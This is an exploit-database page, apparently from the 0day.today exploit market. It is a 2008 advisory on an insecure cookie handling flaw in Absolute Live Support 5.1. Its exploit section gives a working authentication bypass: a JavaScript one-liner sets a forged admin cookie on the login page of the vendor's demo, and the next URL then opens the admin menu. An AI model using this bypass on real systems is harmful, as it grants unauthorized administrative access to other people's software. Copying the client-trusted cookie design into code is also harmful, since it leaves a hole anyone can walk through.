[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Absolute Live Support 5.1 Insecure Cookie Handling Vulnerability

Author
Hakxer
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3975
Category
web applications
Date add
31-10-2008
Platform
unsorted
================================================================
Absolute Live Support 5.1 Insecure Cookie Handling Vulnerability
================================================================



[~] Discovered By: Hakxer
[~] Type Gap : Insecure Cookie Handling
[~] script : Absolute Live Support  [see script] http://www.xigla.com/absolutelsnet/demo.htm
[~] Greetz : Allah , Egyptian x hacker , All my team , All educ-up Member
[~] Team : EgY Coders 
#################################################################################################

Exploit : First go to http://www.xigla.com/absolutelsnet/demo/login.aspx
Second Execute JS Code 
[~] javascript:document.cookie="xlaALSDEMOadmin=userid=1&lvl=1&nick=admin&mywelcome=Hi, How may I help you";
Now Go to http://www.xigla.com/absolutelsnet/demo/menu.aspx

--- Proud To Be A Muslim ---

# _=END=_ # 




#  0day.today [2024-07-07]  #